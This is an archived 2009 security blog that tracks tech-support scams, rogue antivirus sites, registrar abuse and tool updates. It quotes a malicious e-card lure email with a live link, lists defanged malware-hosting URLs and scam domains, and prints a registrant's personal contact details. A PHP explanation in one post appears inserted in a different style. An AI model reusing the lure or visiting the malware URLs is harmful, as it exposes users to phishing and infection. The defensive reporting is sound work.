I'm happy to report, we've now more chance of reaching and warning a lot more people about this scam, as The Register has picked this up!

In addition, some more digging has revealed a couple more of their domains. Namely;

supportonclick.co.uk
supportonclick.net
concernforcalcutta.org (registered via DirectI)

References

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

New scam - They call you by phone!
http://www.malwarebytes.org/forums/index.php?showtopic=11156

Staffordshire Council - Telephone computer support warning (PDF)
http://www.staffordshire.gov.uk/NR/rdonlyres/6997DBB0-E31E-4AFB-A886-C9DDEE114204/90090/TelephoneComputerSupportWarning.pdf

Bigpond and Supportonclick??
http://forums.whirlpool.net.au/forum-replies-archive.cfm/1057308.html

Cold call scam warns of virus infection
http://www.h-online.com/security/Cold-call-scam-warns-of-virus-infection--/news/112893

Fake tech support call scam - prefetch virus logmein123.com
http://www.digitaltoast.co.uk/fake-tech-support-call-scam-prefetch-virus-logmein123com

Friday, 10 April 2009

hpHosts Online update: .tv WhoIs support fixed

I didn't realise I'd forgotten to add support for .tv domains to the WhoIs routine until I was checking a domain suspected of phishing.

I've now fixed this, so .tv domains will now display the correct WhoIs results. For example;

http://hosts-file.net/?s=aktenzeichen-xy.tv&wn=1

If you find any other TLDs not showing the correct WhoIs results, please do let me know.

/edit

I've fixed it for .at domains too :o)

Bill P, author of WinPatrol, recognized by Upload.com (aka Download.com)

I received the latest upload.com newsletter a few minutes ago, and was pleased to see the following (re-formatted for readability);

BillP, also known as the developer of WinPatrol

Bill Pytlovany has been through a lot during his career, which includes being one of the original developers of AOL as well as being the brain behind a live simul-chat with Michael Jackson and AOL members. MTV eventually adopted this technology for video chats and called it MTC's Yak Chat. BillP also took part in creating a real-time game play on the Internet that would sync up with Sunday and Monday Night Football and College Bowl games. Today, this kind of technology seems ancient since we now have the capability to watch live TV on our mobile phones, but back in the 90's, it was unheard of!

As passionate as he was about all of these fun projects that came his way, he found his "It" project when he developed a program to help his family and friends prevent spyware programs from taking over their computers. Long before the terms anti-spyware and anti-virus became household names, WinPatrol soon became BillP's biggest passion to fight for internet safety.

Today, WinPatrol is available in 13 different languages with the help of volunteers on the localization effort and has gone through some 16 different versions. WinPatrol has created a devoted following and has its own group on Facebook and Twitter, with BillP being acknowledged most recently by Microsoft as one of the Microsoft's Most Valuable Professionals.

Congrats, BillP!


Read the rest of the newsletter
http://nl.com.com/view_online_newsletter.jsp?list_id=e482

I've been a fan of Bill's ever since I first came across WinPatrol several years ago, and am proud to call him a friend. The amount of selfless work he devotes to helping the community is astounding. So here's to you Bill, recognition is well overdue!

Hosted javascript leading to .cn PDF malware

Unfortunately such subject lines are all too common. However, let's work through this one together to show an excellent tool, and a common source.

Steve Burn over at it-mate.co.uk submitted an investigation they had been running into a number of sites hosted by a single hosting provider being compromised and leading to malware.

So, let's look at a few examples:

Firstly, just a simple proof that the exploit is still in place, let's look at:

hxxp://www.adammcgrath.ca (216.97.237.30 - Whois : OrgName: Lunar Pages)

If you simply curl, or wget, the home page of this site, you'll get


Read the full article
http://isc2.sans.org/diary.html?storyid=6178

Trial-Pay: A free subscription is NOT as free as you think!

I've been seeing these Trial Pay options for a while now, for the likes of Avira etc. I've always been skeptical of these, and always recommended people stay away from them (if you don't want to pay for a licence to use a program, don't use the program - there are almost always free alternatives). Sadly, people still believe Trial Pay are going to give you a free subscription to something - this is simply NOT TRUE.

In the vast majority of cases, you have to either PURCHASE or REGISTER for something in order to get this "free" licence. As I've said many times before, if you've got to pay or register for something - IT IS NOT FREE!

Don't believe me? Check their terms of service, specifically;

Completing a TrialPay Checkout and Offer
a. In order to successfully complete the TrialPay checkout and receive your product, you must initiate the completion of the third-party offer ("advertiser offer") from within the TrialPay checkout. Any transactions (offer completions) initiated directly on the third-party website without originating from within the TrialPay checkout will not be tracked by our advertising partners and you will not be credited for your product/service.


Still don't believe me? See what my friend Donna has to say;

http://www.calendarofupdates.com/updates/calendar54718

Thursday, 9 April 2009

Black Hat SEO and Rogue Antivirus p.7

Finjan's Malicious Code Research Center has made a nice report about the business with rogue antivirus software (redirecting visitors from legitimate Web sites). Zdnet Article

The article can be found in the latest Cybercrime Intelligence Report

--------------------------------------------------------------------------------
I just want to show you some script added on legit websites and the log we've found on the criminal web server.

Note that for each site on this blog like goscanfuse.com, scan6lite.com, scan7new.com, every domain is listed in the Google API "Safe Browsing" and each of them reveals a lot of information, e.g. the number of domains used (compromised) and others in conjunction.

--------------------------------------------------------------------------------

We start by a Google Safe Browsing Diagnostic for: scanline6.com


Read more
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p7.html

HostExploit and Directi: Actions against registry services abuse – Report April 2009

Registrar Abuse
  1. 8,506 domain names have been suspended that were either involved in abusive activity or registered by customers/registrants exhibiting persistent patterns of abuse.
  2. These domain names (and/or their registrants) were involved in various types of abuse, such as spamming, phishing/spoofing, malware perpetration, child pornography, financial frauds and falsified ‘Whois’ information.
  3. All other services utilized by any of these domain names have also been revoked.
Analysis

When suspending domain names on receiving complaints about their involvement in abuse, HostExploit is pleased to report that Directi, while reviewing the complaints over the past few months, found certain trends:
  1. Domain names registered with the same/similar contact information (name, address patterns)
  2. Bulk registrations of domain names with a slight variation in the domain name e.g. 2008bases1.net, 2008bases2.net, 2008bases3.net, 2008bases4.net, 2008bases5.net …. by abusive registrants/customers
  3. Same blacklisted name servers being repeatedly utilized.
  4. Registrations in the same customer account involved in various forms of abuse
  5. Based on these, we reviewed all domain names, first in the customer's account, then in the reseller's account and then across the databases.
An active list of directly suspended domains is available for download from HostExploit.com


Read the full article:
http://hostexploit.com/index.php?option=com_content&view=article&id=124:actions-against-registry-services-abuse-report-april-2009-hostexploit-and-directi&catid=4:hostexploit-news

Wednesday, 8 April 2009

PCButts still causing a ruckus ....

PCButts (aka Christopher Butts) has been known for years for both stealing other people's software and claiming it as his own, and for claiming to be a Microsoft MVP, when he isn't (if you are in doubt about this claim, contact Microsoft themselves - they'll confirm this). A whole slew of us have been monitoring him for years to see what he's up to, and the latest ruckus he's caused, which to his credit, is the one thing he can do all by his lonesome, is most certainly nothing new.

Alas, the reason people keep helping him cause a commotion by responding to him is because he continues peddling the stuff he's stolen to those in need of REAL help (aka help from those both qualified to do so, and capable of doing so without stealing other people's work).

"PA Bear", who actually IS a Microsoft MVP, wrote the following in one of the Microsoft newsgroups, to allow quick and simple clarification of the facts surrounding PCButts;

Stop talking to yourself!

What's the "real truth" about pcbutts1? Read on...


. Is he an MS MVP? No!
cf. http://mvp.support.microsoft.com/communities/mvp.aspx

. Are his downloads safe? No!
cf. http://msmvps.com/blogs/hostsnews/archive/2009/02/25/1673723.aspx

. If xxx.ms-mvp.org redirects to xxx.pcbutts1.com, why doesn't he post that
link to begin with?


. Is he a proven thief? Yes!
cf.
http://msmvps.com/blogs/hostsnews/archive/2006/11/10/pcbutts1-_2E00__2E00_.-the-saga-continues-_2E00__2E00__2E00_.aspx
cf.
http://groups.google.com/group/microsoft.public.security.homeusers/msg/213247814fb4d61e
cf.
http://groups.google.com/group/microsoft.public.security.homeusers/msg/e19fce884897662f


. What do real experts have to say about him? It ain't pretty.
cf. http://www.siteadvisor.com/sites/pcbutts1.com (Reviews)


. Does he have all his marbles?
cf. http://en.wikinews.org/wiki/NASA_van_rolls_off_California_mountain


Ignore this MVP imposter!


http://groups.google.co.uk/group/microsoft.public.windowsxp.general/msg/04e0992669fe4ee1?hl=en

References:

hpHosts Blog: PCButts now serving malware via ms-mvp.org
http://hphosts.blogspot.com/2009/02/pcbutts-now-serving-malware-via-ms.html

PCButts - Internet Software Thief
http://temerc.blogspot.com/2006/09/pcbutts-internet-software-thief.html

PCButts - Coward Behind The Curtain
http://temerc.blogspot.com/2007/01/pcbutts-coward-behind-curtain.html

TeMerc Real MVP vs. PCButts Fake MVP
http://www.temerc.com/forums/viewtopic.php?f=25&t=2665

BugHunter - Info on PCButts
http://bughunter.it-mate.co.uk/pcbutts.txt

Plagiarism and intellectual theft...
http://msmvps.com/blogs/spywaresucks/archive/2006/11/10/272921.aspx

I ain't happy about this.....
http://msmvps.com/blogs/spywaresucks/archive/tags/I+ain_2700_t+happy+about+this_2E00__2E00__2E00__2E00__2E00_/default.aspx?PageIndex=2

I do believe PCBUTTS1 has finally lost the plot
http://msmvps.com/blogs/spywaresucks/archive/2006/09/08/I-do-believe-PCBUTTS1-has-finally-lost-the-plot.aspx

PCButts1 - The Saga Continues
http://msmvps.com/blogs/hostsnews/archive/2006/11/10/pcbutts1-_2E00__2E00_.-the-saga-continues-_2E00__2E00__2E00_.aspx

WinPatrol 16.0.2009.1

16.0.2009.1

Changes only affect Vista and Windows 7 users
Improved HOSTs change detection in Vista
Fixed Exit dialog (if checked) when switching to UAC mode.
Remove redundant switching to UAC mode dialog. All versions

AutoUpdate and UAC change detected included in Option with HOST file changes


Changelog
http://www.winpatrol.com/upgrade.html

Download
http://www.winpatrol.com/download.html

Bits from Bill
http://billpstudios.blogspot.com

Hat tip to CoU for the heads up

http://www.calendarofupdates.com/updates/index.php?act=calendar&code=showevent&calendar_id=1&event_id=54658

Malicious April eCard from greet2k.com

It seems we've got another ecard malpaign about to start. A few minutes ago, I received the following;

Hello,

A friend had sent you a
new electronic e-card
from our Free Electronic
e-Card Service.

Your e-Card number is: 091236A51201D3G

This e-Card was created today.

Use the following method to view your e-Card:

==============
Method
==============

To view your new greeting card,
simply click on the following link:

http://www.greet2k.com/ecards/cgi-bin/postbox.php?card=091236A51201D3G
(If your mail program does not support this feature, you will have to COPY and PASTE the address into your browser's location bar.)


Regards
Webmaster


Going to the URL in the e-mail results in an error stating "Sorry the card does not exists.", which likely means this one is still being set up. If we drop to the cgi-bin directory however, we see;



What is strange is that thedeadpit.com was actually used in attacks a couple of months ago, and is suspended so no longer resolves;

http://blog.scansafe.com/journal/2009/1/21/thedeadpitcom-tortures-web-surfers.html

Meaning our ecard author either hasn't done his homework, is a script kiddie that's not clever enough to check things actually work before using them, or is still setting it up (in which case, the domain in use will likely change).

WhoIs Information:

Referred to: whois.PublicDomainRegistry.com
By: whois.internic.net

Domain Name: THEDEADPIT.COM

Registrant:
N/A
Julia Taukova (donorsi@yahoo.com)
mustamae 4-11
Tallin
Harjumaa,14865
EE
Tel. +37.2953412

Creation Date: 03-Dec-2008
Expiration Date: 03-Dec-2009

Domain servers in listed order:
ns2.suspended-domain.com
ns1.suspended-domain.com


Ref:
http://hosts-file.net/?s=thedeadpit.com

Standard rules apply of course - NEVER EVER EVER click URLs or open attachments in e-mails.

Tuesday, 7 April 2009

Web of Trust (WoT) experiencing data center issues

Just a note folks. Most of you will likely already be aware that WoT (Web of Trust) has been down for a few hours.

I got in touch with my friend Sami at Web of Trust to find out what was going on and the following was her response;

Hi,

Our service provider is experiencing some major problems and the data center where our web servers are is down. The add-on is still working, right?

Sami


I've checked and can confirm the add-on is still working, so this issue only affects the website and forums etc. The add-on is unaffected by this.

I'll keep you posted on any developments.

/edit 19:19

Web of Trust is now back online folks!

Sunday, 5 April 2009

CyberDefender update: Sort of happy news!

In a very unexpected twist, it seems CyberDefender have seen the error of their ways (publicity hurt huh?) and have returned ALL of Slider51's $250. I am actually extremely surprised at this, for two reasons;

1. It's CyberDefender
2. They've backstepped on their original claim of their only being able to return half of it due to their "technical support" not being covered in the money back guarantee.

I fully expect them to continue putting people through this, especially given their history, but I'm glad they've returned the money they owed, and have actually honored their money back guarantee.

Just before I logged in to this forum, I checked my credit card activity online and noted two credits from CyberDefender - one for $129.99 and yesterday another for $120.00. I have my money back, and I am positive that had I not enlisted Icrontic's help that would never have happened.

Returning my money does NOT exonerate CyberDefender, however. They need to be investigated - "Sheur2XLC" Trojan doesn't exist, at least not under that name. Their "free" version (not free at all!) is the smoking gun - it contains the "hook" that leads one to believe there is nothing left to do but buy their software and let their technicians "fix" the unwary user's machine, because nobody else's software can identify or fix this threat. Once I bit down on the hook, I changed from a customer to their prey. Once a rogue, always a rogue. They may have given my $250 back, but they cost me many many hours of time and anguish, and consumed a bunch of Icrontic's time and expertise in helping me to weed through their mess.


Perhaps now they'll also return the money they owe these folks?

http://www.complaintsboard.com/bycompany/cyber-defender-a102623.html

http://www.ripoffreport.com/searchresults.asp?q5=CyberDefender&Search=Search&q1=ALL&q4=&q6=&q3=&q2=&q7=&searchtype=0&submit2=Search%21

... and better yet, stop scamming people to begin with? (I can dream ....).

If you've been ripped off by CyberDefender, please do let me know, and if you're using it willingly (ad supported version or paid*), GET RID OF IT!

* The last time I checked (2007), the paid version came with ads too, which is one of the things that started the whole CD debacle. Sadly I'm unable to check whether or not the newer paid versions also contain these ads, as I highly doubt they're going to give me a licence so I can find out. So if you're using the paid version, PLEASE do let me know if ANY of the adverts I pointed out in the original article are still present (or indeed, any new ones).



References

CyberDefender: Want your money back? Forget it!
http://hphosts.blogspot.com/2009/03/cyberdefender-want-your-money-back.html

Rogue company, CyberDefender, uses MBAM to clean infections
http://hphosts.blogspot.com/2009/03/rogue-company-cyberdefender-uses-mbam.html

CyberDefender: Early Deceit
http://mysteryfcm.co.uk/?mode=Articles&date=17-04-2007

CyberDefender and it’s adverts!
http://www.securitycadets.com/2007/05/cyberdefender-and-its-adverts/

Saturday, 4 April 2009

Portable Ubuntu Runs Ubuntu Inside Windows

Windows only: Free application Portable Ubuntu for Windows runs an entire Linux operating system as a Windows application. As if that weren't cool enough, it's portable, so you can carry it on your thumb drive.

Built from the same guts as the andLinux system that lets you seamlessly run Linux apps on your Windows desktop, Portable Ubuntu is a stand-alone package that runs a fairly standard (i.e. orange-colored, GNOME-based) version of the popular Ubuntu Linux distribution. It just doesn't bother creating its own desktop, and puts all its windows inside your Windows, er, windows.


Read the full article
http://lifehacker.com/5195999/portable-ubuntu-runs-ubuntu-inside-windows

Portable Ubuntu
http://portableubuntu.sourceforge.net

Download
http://portableubuntu.sourceforge.net/index.php?section=download

Friday, 3 April 2009

Black Hat SEO planting trojans p.5

After promoting some spyware and other rogue security software, now this is another list of compromised websites, all with obfuscated javascript code inserted, which results in:

hxxp://94.247.2.195/news/?id=100
(Analysis)

which calls

hxxp://94.247.2.195/news/?id=2

and downloads a PDF with a random name (QRB.pdf, WXk.pdf ...)

File size: 10417 bytes
MD5: af28f3bc9424a3da7ff8bc84740bce93

VirusTotal Analysis: 0/40 (0%)

which, when run, loads

hxxp://94.247.2.195/news/?id=10&


Read the full article
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p5.html

Black Hat SEO and Rogue Antivirus p.6

Yet another WinWebSecurity variant, this one through crack/serial websites and an ad network

Fake ad:
BE PROTECTED! - FREE online system scan for viruses, trojans and malware.
Check it out - maybe someone have access to your PC right now! Protect yourself.

Which results in a complete set of redirections


Read the full article
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p6.html

Black Hat SEO and Rogue Antivirus P.4

This is just a sample of websites found in the previous days which are still running.
(with some ThreatExpert or VirusTotal reports)

Sites running on these IPs can also be found on this blog and several other forums.

Hosted by Netelligent Hosting Services Inc on the IP 209.44.126.14


Hosted by Layered Technologies, Inc on the IP 72.233.34.6

zpmuwbtqqwkw.net

Hosted by ZlKon on the IP 94.247.3.3

greatvirusscan.com - ThreatExpert Report
webprotectionscan.com - ThreatExpert Report


Read the full article
http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-and-rogue-antivirus-p4.html

Thursday, 2 April 2009

Windows Secrets misleading ParetoLogic spamvertising ......

Now, this is actually a paid advertisement, but the information is blatantly misleading. The Conficker worm did not go active on April 1. The Conficker worm has been active for months. On April 1 the Conficker worm changed an algorithm, that’s all. The Conficker worm is not one of the worst viruses in history. The worm is one of the most wide spread, but it is not known to have stolen data, as many threats have done. Conficker is not known to have sent spam. Conficker has not been confirmed as participating in DDOS for extortion attacks. Conficker has not been implicated in identity theft or credit card fraud.

When WindowsSecrets.com is willing to publish such sad hype and misleading information for a few bucks, you have to question the validity of any information they publish.


Read more
http://www.eset.com/threat-center/blog/?p=920

Essential Maintenance: vURL Online/Intranet server

Please note, due to essential maintenance, the *.mysteryfcm.co.uk server may respond slower than normal.

I'm trying to keep it online whilst this is performed, but once done, it should reduce the errors people have been receiving (I've also fixed a bug in the code).

My apologies for any inconvenience this may cause.

/edit 02-04-2009 15:55

Maintenance is now complete.

Wednesday, 1 April 2009

Spambot Search Tool: v0.27

* Fixed the StopForumSpam "limit exceeded" message being accidentally displayed when the limit hasn't been exceeded (they've not implemented the limit yet, so it couldn't have been)

If you'd like to save yourself downloading it, you can fix it by changing;

if($bSFSLimit=true){


To;

if($bSFSLimit==true){


... in check_spammers_plain.php
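To see why that single character matters, here is an added illustration (not code from the Spambot Search Tool itself) with a hypothetical helper that decides whether the limit message is shown, in the buggy form, the fixed form, and a stricter variant:

```php
<?php
// Added illustration, not code from the Spambot Search Tool.
// The function names and the message text are assumptions for this example.

// Buggy form (as in v0.26 and earlier): a single '=' ASSIGNS true to
// $bSFSLimit. The value of an assignment expression is the assigned value,
// so the condition is always true and the message shows on every request.
// The caller's flag is also silently overwritten.
function sfs_limit_message_buggy($bSFSLimit) {
    if ($bSFSLimit = true) {
        return 'StopForumSpam limit exceeded';
    }
    return '';
}

// Fixed form (v0.27): '==' COMPARES, so the message is returned only when
// the caller actually set the flag.
function sfs_limit_message_fixed($bSFSLimit) {
    if ($bSFSLimit == true) {
        return 'StopForumSpam limit exceeded';
    }
    return '';
}

// Stricter variant (hypothetical, not in the tool): '===' also rejects
// truthy non-booleans such as the integer 1 or a non-empty string, and
// putting the constant on the left turns a mistyped '=' into a parse error
// instead of a silent bug.
function sfs_limit_message_strict($bSFSLimit) {
    if (true === $bSFSLimit) {
        return 'StopForumSpam limit exceeded';
    }
    return '';
}

// Constructed inputs: in both cases the limit has NOT been exceeded, so only
// the buggy version returns a non-empty message.
foreach ([false, 0] as $flag) {
    var_dump(sfs_limit_message_buggy($flag));
    var_dump(sfs_limit_message_fixed($flag));
    var_dump(sfs_limit_message_strict($flag));
}
```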

Download:
http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

hpHOSTS - UPDATED April 1st, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 59,358 listed hostnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 01/04/2009 17:45
  2. Last Verified: 01/04/2009 17:09

Download hpHosts now!
http://hosts-file.net/?s=Download

Apologies for the delay folks!

eEye: Conficker Detection Scanner and Patch Identification Utility

Found the following eEye security advisory in my inbox:

In response to Conficker, a breed of self-updating worms that is difficult to avoid, researchers at eEye Digital Security (www.eeye.com/ ) have devised a Conficker detection engine that centers on running a network scan to detect hosts compromised by or vulnerable to Conficker. In a proactive measure to protect users, starting today, organizations can download from eEye a free utility that is built around the company's Retina Network Security Scanner that will detect hosts that are compromised with this latest worm and malicious botnet or do not have MS08-067 applied, the most effective propagation technique that Conficker uses.

The Retina Utility from eEye can be downloaded at: http://www.eeye.com/html/downloads/other/ConfickerScanner.html

In addition to the detection of the Conficker worm, eEye Digital Security's Blink Endpoint Protection Platform can effectively protect hosts, even if they are not patched, from the propagation of this worm. Using protocol based IPS analyzers, Blink can detect and stop the malicious traffic associated with MS08-067 and block the worm from self propagating. For installations that are already infected, Blink's multi layer antivirus engine will remove the Conficker worm and provide protection until a permanent remediation is performed on the host.


Learn more
http://www.eeye.com/html/conficker/index.html

Download
http://www.eeye.com/html/downloads/other/ConfickerScanner.html